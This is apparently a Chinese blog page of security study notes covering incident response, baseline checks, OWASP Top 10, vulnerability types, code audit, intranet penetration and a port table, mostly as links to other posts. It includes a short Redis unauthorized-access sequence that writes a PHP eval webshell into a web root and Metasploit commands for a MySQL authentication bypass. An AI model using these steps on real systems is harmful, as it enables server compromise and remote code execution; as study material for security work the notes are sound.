0x00 应急响应
理论
1、概述
应急响应是指针对已经发生或可能发生的安全事件进行监控、分析、协调、处理、保护资产安全。
2、阶段
a.准备阶段:预防为主,例如扫描、风险分析、打补丁等。
b.检测阶段:检测事件是已经发生的还是正在进行中的,以及事件产生的原因。确定事件性质和影响的严重程度,以及预计采用什么样的专用资源来修复。
c.抑制阶段:限制攻击/破坏波及的范围,同时也是降低潜在的损失。抑制策略:完全关闭所有系统;从网络上断开主机或断开网络部分;修改所有防火墙和路由器过滤规则;封锁或删除被攻击的登录账号;加强对系统和网络行为的监控;设置诱饵服务器进一步获取事件信息;关闭受攻击的系统或其它相关系统的部分服务。
d.根除阶段:通过事件分析找出根源并彻底根除,以避免攻击者再次使用相同的手段攻击系统。
e.恢复阶段:把被破坏的信息彻底换原到正常运作状态。
f.总结阶段:回顾并整合应急响应过程的相关信息,进行事后分析总结和修订安全计划、政策、程序,并进行训练,以防止入侵的再次发生。
3、场景
勒索病毒、挖矿木马、Webshell、网页篡改、DDos攻击、数据泄露、流量劫持。
4、大致步骤
事件类型
时间范围
系统排查
进程排查
服务排查
文件痕迹排查
日志分析
得出结论
5、排查流程
网络安全应急响应(归纳)_花城的包包的博客-CSDN博客_网络安全应急响应
windows、linux、数据库应急响应、以及应急响应的日志分析、流量分析技术见公司pdf
0x01 基线检查
理论
基线一般指配置和管理系统的详细描述,或者说是最低的安全要求,包括服务和应用程序设置、操作系统组件的配置、权限和权利分配、管理规则等。
漏洞是在系统实现或系统安全策略上存在的缺陷,例如应用软件或操作系统软件在逻辑设计上的缺陷或在编写时产生的错误,这个缺陷或错误可以被利用,从而使攻击者能够在未授权的情况下访问或破坏系统。
从狭义的角度,漏洞更多指系统设计和开发的缺陷,但从广义的角度,配置问题是一种系统漏洞,需要用户及时处理修复。
脚本测试流程
(1)下载脚本,将脚本拷贝至被检测主机;
(2)终端执行命令:check.exe ip
(3)执行完之后会生成一个result文件夹,将该文件夹内所有内容导入安恒基线检查平台导出报告
基线检查手测(公司视频有)
windows
window基线检查_weixin_46164380的博客-CSDN博客_windows安全基线检查
linux
linux安全基线检查内容_杨治中的博客-CSDN博客_安全基线检查
数据库
mysql 基线检查_Mysql安全基线检测命令_冯颉的博客-CSDN博客
0x02 OWASP top10(2021年)
// 2021版的owasp也已经更新,分别依次是:失效的访问控制、加密失败、注入、不安全的设计、安全配置错误、易受攻击和过时的组件、认证和授权失败、软件和数据完整性故障、安全日志记录和监控失败、服务端请求伪造(SSRF)。2021中出现了三个新类别,四个类别的命名和范围发生了变化。
链接:
关于OWASP Top 10 2021的整理_才殊学浅的博客-CSDN博客_owasp top10
0x03 需详细掌握原理的漏洞
1、汇总链接(OWASP top10 2017年)
【渗透整理】OWASP Top 10_久违 °的博客-CSDN博客_owasp top10
2、中间件
小结
中间件漏洞总结_shayebudon的博客-CSDN博客_中间件漏洞
常见中间件漏洞复现
3、数据库安全
(1)弱口令
(2)sql注入详解
❤️分类
(1)sql注入类型_iuyoo的博客-CSDN博客_sql注入类型
(2)初学SQL 注入之常见的几种注入类型_八阿哥.的博客-CSDN博客_0x7e
❤️注入方法
常见SQL注入类型及原理_1stPeak的博客-CSDN博客_sql注入的几种类型
❤️基本语句
1)查询
# 查询所有字段
select * from users;
# 查询指定字段
select user,password from users;
# 条件查询
select * from users where user='admin';
# 逻辑与
select * from users where user='admin' and user_id= 6;
# 逻辑或
select * from users where user='adminn' or user_id= 5;
3)sqlmap语句
sqlmap使用教程大全命令大全(图文)_Cwillchris的博客-CSDN博客_sqlmap使用教程
❤️waf绕过
SQL注入之WAF绕过注入_Crazy Anime的博客-CSDN博客_sql注入waf绕过
(3)redis未授权
❤️利用步骤:
redis-cli -h ip //客户端链接至redis
>config set dir /var/www/html //设置写入目录
>config set dbfilename shell.php //设置写入文件
>set webshell "<?php @eval($_POST[x]);?>" //以键值对的形式写入一句话木马
>save // 保存(4)mysql身份认证(CVE-2012-2122)
❤️利用步骤:
mestasploit
msf > use auxiliary/scanner/mysql/mysql_authbypass_hash
msf auxiliary(mysql_authbypass_hash) > show options (查看选项)
msf auxiliary(mysql_authbypass_hash) > set RHOSTS ip (目标)
msf auxiliary(mysql_authbypass_hash) > run3、操作系统安全
1)概述
2)msf
3)windows漏洞
4)linux漏洞
4、xss详解
简单总结
类型讲解(尤其是dom)
XSS攻击详解_poggioxay的博客-CSDN博客_xss攻击
5、文件上传绕过
文件上传检测的多种绕过姿势_LandGrey的博客-CSDN博客
6、反序列化
PHP反序列化
PHP中序列化与反序列化_小白白@的博客-CSDN博客_php序列化与反序列化
Java反序列化
清晰易懂java反序列化漏洞简介_1024zz的博客-CSDN博客_java反序列化漏洞
🌟fastjson
Fastjson反序列化漏洞_一句话木马的博客-CSDN博客_fastjson反序列化漏洞
🌟shiro
shiro反序列化漏洞(CVE-2016-4437)_iO快到碗里来的博客-CSDN博客_shiro反序列化漏洞
7、框架漏洞
(1)Java
【Web安全】Web安全Java代码审计总结_l1b2090的博客-CSDN博客_java代码审计实战
JAVA常用框架及漏洞_xzhome的博客-CSDN博客_java漏洞
(2)PHP
PHP常用框架及漏洞_xzhome的博客-CSDN博客_php框架漏洞
0x04 代码审计
//一般使用fortify跑,然后对结果进行排错。手测一般反向溯源关键字所在函数,查找是否有漏洞或过滤不严的情况,然后进行渗透验证猜想。
1、代码审计流程及常见漏洞
(1)代码审计基础流程及常见漏洞_马戏团小丑的博客-CSDN博客_代码审计流程
(2)大佬的汇总:【代码审计】专栏文章汇总_武天旭的博客-CSDN博客
2、工具
windows:fortify sca、seay
mac:understand
4、一些小结和经验
【无标题】代码审计_~#114的博客-CSDN博客_代码审计
【Web安全】Web安全Java代码审计总结_l1b2090的博客-CSDN博客_java代码审计实战
5、案例&&个人总结
【代码审计】——PHP项目类RCE及文件包含下载删除_haoaaao的博客-CSDN博客
【代码审计】—JAVA项目注入、上传、插件挖掘_haoaaao的博客-CSDN博客
🌟其他总结见公司的视频总结
0x05 内网渗透&&域渗透
概念&&总结
渗透知识-内网渗透(详细版本)_Mr. Sun_的博客-CSDN博客_内网渗透
内网渗透--总结_四月男孩的博客-CSDN博客_内网渗透测试
内网渗透案例
一个完整的内网渗透是什么样子的_普通网友的博客-CSDN博客
域渗透案例
内网渗透-完整的域渗透_OceanSec的博客-CSDN博客_域渗透流程
工具—msf
详尽的msf——meterpreter——渗透测试教程_大瑞大的博客-CSDN博客_msf渗透工具
msf渗透命令和后渗透攻击_~ Venus的博客-CSDN博客_msf渗透
网安基础
1、端口号及作用
端口 作用说明
21 21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务。
23 23端口主要用于Telnet(远程登录)服务,是Internet上普遍采用的登录和仿真程序。
25 25端口为SMTP(Simple Mail Transfer Protocol,简单邮件传输协议)服务器所开放,主要用于发送邮件,如今绝大多数邮件服务器都使用该协议。
53 53端口为DNS(Domain Name Server,域名服务器)服务器所开放,主要用于域名解析,DNS服务在NT系统中使用的最为广泛。
67、68 67、68端口分别是为Bootp服务的Bootstrap Protocol Server(引导程序协议服务端)和Bootstrap Protocol Client(引导程序协议客户端)开放的端口。
69 TFTP是Cisco公司开发的一个简单文件传输协议,类似于FTP。
79 79端口是为Finger服务开放的,主要用于查询远程主机在线用户、操作系统类型以及是否缓冲区溢出等用户的详细信息。
80 80端口是为HTTP(HyperText Transport Protocol,超文本传输协议)开放的,这是上网冲浪使用最多的协议,主要用于在WWW(World WideWeb,万维网)服务上传输信息的协议。
99 99端口是用于一个名为“Metagram Relay”(亚对策延时)的服务,该服务比较少见,一般是用不到的。
109、110 109端口是为POP2(Post Office Protocol Version 2,邮局协议2)服务开放的,110端口是为POP3(邮件协议3)服务开放的,POP2、POP3都是主要用于接收邮件的。
111 111端口是SUN公司的RPC(Remote ProcedureCall,远程过程调用)服务所开放的端口,主要用于分布式系统中不同计算机的内部进程通信,RPC在多种网络服务中都是很重要的组件。
113 113端口主要用于Windows的“Authentication Service”(验证服务)。
119 119端口是为“Network News TransferProtocol”(网络新闻组传输协议,简称NNTP)开放的。
135 135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务。
137 137端口主要用于“NetBIOS Name Service”(NetBIOS名称服务)。
139 139端口是为“NetBIOS Session Service”提供的,主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。
143 143端口主要是用于“Internet Message Access Protocol”v2(Internet消息访问协议,简称IMAP)。
161 161端口是用于“Simple Network Management Protocol”(简单网络管理协议,简称SNMP)。
443 443端口即网页浏览端口,主要是用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP。
554 554端口默认情况下用于“Real Time Streaming Protocol”(实时流协议,简称RTSP)。
1024 1024端口一般不固定分配给某个服务,在英文中的解释是“Reserved”(保留)。
1080 1080端口是Socks代理服务使用的端口,大家平时上网使用的WWW服务使用的是HTTP协议的代理服务。
1755 1755端口默认情况下用于“Microsoft Media Server”(微软媒体服务器,简称MMS)。
4000 4000端口是用于大家经常使用的QQ聊天工具的,再细说就是为QQ客户端开放的端口,QQ服务端使用的端口是8000。
5554 在今年4月30日就报道出现了一种针对微软lsass服务的新蠕虫病毒——震荡波(Worm.Sasser),该病毒可以利用TCP 5554端口开启一个FTP服务,主要被用于病毒的传播。
5632 5632端口是被大家所熟悉的远程控制软件pcAnywhere所开启的端口。
8080 8080端口同80端口,是被用于WWW代理服务的,可以实现网页。
2、ids和ips
什么是IDS IPS以及IDS,IPS的区别_ProofM的博客-CSDN博客_ips和ids
3、网安基础知识
网络安全基础知识_尼古拉斯-大聪明的博客-CSDN博客_网络安全基础知识
4、入侵检测与日志分析
应急响应入侵检测与日志分析_qq_42080601的博客-CSDN博客_入侵检测日志分析
扫一扫
2147
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
